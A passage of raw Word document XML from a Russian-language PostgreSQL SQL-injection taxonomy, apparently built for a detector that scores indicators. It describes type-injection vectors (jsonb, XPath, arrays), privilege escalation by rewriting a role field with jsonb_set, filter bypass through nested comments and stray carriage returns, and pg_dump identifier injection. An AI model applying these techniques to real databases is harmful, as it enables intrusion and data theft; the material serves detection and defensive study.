      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>type_inj_array</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:t>. Чуть ниже risk, потому что some legitimate use cases of array-concat существуют (например, dynamic IN-list через unsafe-но-legitimate-в-аналитике конкатенацию); индикатор требует более тщательного контекстного анализа.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33463994" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>risk сопоставим с FILTER_BYPASS (6-8) — обе категории про "паттерн-маркер атаки", не "точно атака"; LLM-судья принимает финальное решение по совокупности.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281BAAD9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Использованные источники</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487616A1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PostgreSQL Docs</w:t>
      </w:r>
      <w:r>
        <w:t>: Boolean Type, JSON Functions and Operators (включая jsonpath), XML Functions, Arrays — все subsection в одной документации, основа категории.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754F097C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>W3C</w:t>
      </w:r>
      <w:r>
        <w:t>: XPath 1.0 Specification — grammar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="742BC292" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SQL standard</w:t>
      </w:r>
      <w:r>
        <w:t>: SQL:2016 SQL/JSON path expressions — основа PG 12+ JSONPath.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD443DD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CVE-2017-7484, CVE-2021-43795</w:t>
      </w:r>
      <w:r>
        <w:t>: исторический контекст для XML-ограничений в PG.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633C539E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Общие</w:t>
      </w:r>
      <w:r>
        <w:t>: PortSwigger Web Security Academy (XPath injection, NoSQL injection как аналог JSONPath), HackTricks PostgreSQL Injection (type coercion bypass, JSON operators), OWASP (XPath Injection), driver-документация (psycopg3, asyncpg, pgjdbc, node-postgres, pgx).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C60C88A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Перекрёстные ссылки на следующие категории</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FA1E70" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.1 (UNION-based)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — downstream leak channel для всех 3.11 точек входа.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616E9364" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.2 (Error-based)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — главный leak-mechanism для 3.11.1, 3.11.2 cast confusion, 3.11.3 xpath-syntax-error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1941F6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.3 (Boolean-based blind)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — альтернатива через 3.11.1 short-circuit или 3.11.3 xpath_exists.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66046404" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.6 (OOB)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не пересекается с 3.11.3</w:t>
      </w:r>
      <w:r>
        <w:t>, потому что XXE в PG закрыт.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517DCBA3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.8 (Metadata)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — комбо для recon: 3.11.2 path-traversal в jsonb-документах application, 3.11.3 структура XML-документов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61FA126A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.9 (Filter bypass)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — обход WAF на specific keywords внутри type-injection context (3.9.5 hex для подмены </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>password_hash</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в JSONPath; 3.9.6 whitespace в array-literal).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A1636B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.10 (CTE-based)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — комбо 3.11 + 3.10.1: array-injection (3.11.4) + DML в CTE (3.10.1) для write-effect через type-injection entry point.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376FE3D4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.13 (Privilege escalation)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — комбо 3.11.2 + 3.10.1: JSON-документ с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"role": "user"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → атакующий обновляет до </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"role": "admin"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>jsonb_set</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в DML-CTE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A83FB54" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.16 (Identifier injection в plpgsql)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — внутри функций </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>format('%s', json_path_var)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> без </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%I</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — то же type-confusion с identifier.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144DB204" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.7 (Validation)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — практическая защита: schema-validation для JSON paths и XPath expressions, typed array bind через driver, whitelist для всех runtime DSL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B2F788" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Managed-провайдеры</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CED91A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.11 — категория про </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>core PG type system</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, который provider-managed не модифицируют. Все 4 подраздела работают на AWS RDS / Google Cloud SQL / Supabase </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>идентично</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> self-hosted:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316B72DE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.11.1 BOOLEAN coercion</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — фича core type system; никаких provider-уровневых ограничений.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02227FE0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.11.2 jsonb operators</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — встроенные операторы; работают везде. PG 12+ JSONPath доступен на всех managed (если основная версия ≥ 12).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009063F5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.11.3 XML/XPath</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — libxml2 обязательная зависимость PG; managed-провайдеры включают её всегда. CVE-2017-7484 фикс — встроен в core, не отключаем; XXE на managed-PG тоже невозможен.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E576E98" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.11.4 Arrays</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — core feature, работает идентично.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3A9DB9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Один важный нюанс — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Supabase PostgREST</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: REST-DSL транслирует HTTP-параметры в PG-запросы. Использует jsonb-операторы внутри (например, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>?role=eq.admin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE role = 'admin'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>?metadata-&gt;&gt;field=eq.value</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE metadata-&gt;&gt;'field' = 'value'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Здесь jsonb-injection (3.11.2) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>может проходить через PostgREST DSL без фильтрации</w:t>
      </w:r>
      <w:r>
        <w:t>, если приложение использует raw RPC-функции с jsonb-аргументами:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C18724" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   PostgREST sanitizes URL-paths базово (URL-encoding), но не валидирует semantic of jsonb-path inside the value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656A4E1C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   RPC-функции (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>POST /rpc/my_func</w:t>
      </w:r>
      <w:r>
        <w:t>) с JSON body → jsonb-аргументы → внутри plpgsql-функция может конкатенировать в SQL → 3.11.2 + 3.16.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4386CD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>3.11.3 на Supabase PostgREST почти не применимо — XML-функции там редко используются.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B973F43" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Детально по managed-провайдерам — в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.9</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Для self-разведки на текущем кластере: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT version()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для базовой версии (3.8.4 Payload A), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT * FROM pg_extension</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для дополнительных JSON/XML-расширений.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0462D08D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.12.0 Обзор</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE75137" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Категория 3.12 — про </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PG-специфичные особенности парсера комментариев и обработки whitespace в идентификаторах</w:t>
      </w:r>
      <w:r>
        <w:t>, которые создают edge case-классы атак, не сводимые к классическому injection. Это три отдельных механизма:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E239A54" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Вложенные block-комментарии</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* outer /* inner */ ... */</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — PG один из немногих SQL-парсеров, который </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>корректно</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> обрабатывает вложенность. Sanitizer-ы, написанные под общую SQL-семантику (где первый </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> закрывает комментарий), отстают по семантике от PG. Атакующий проталкивает payload через гэп.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E438D9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Однострочные комментарии `--` + `\r`/`\n`/`\r\n`-line terminator</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — PG считает концом строки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>любой из</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\r</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> независимо. Sanitizer-ы часто нормализуют line-endings к </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, оставляя </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\r</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> как обычный байт; payload с одним </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\r</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> после </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> обходит фильтр, но в PG комментарий обрывается.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C659660" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Newline (`\n`/`\r`) внутри identifier-а</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — корректно quoted-identifier (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"name"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) допускает любые байты, включая newline. При сериализации через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_dump</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> это попадает в dump-script как часть SQL-комментария → разрывает комментарий при restore → SQL injection / RCE на client-host. Это регрессионный класс CVE: оригинал — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CVE-2012-0868</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, регрессия в 2025 — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CVE-2025-8715</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (R25).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6046CDE5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Где это пересекается с другими категориями</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1755AF1F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.9.6 (Whitespace tricks)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — там </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
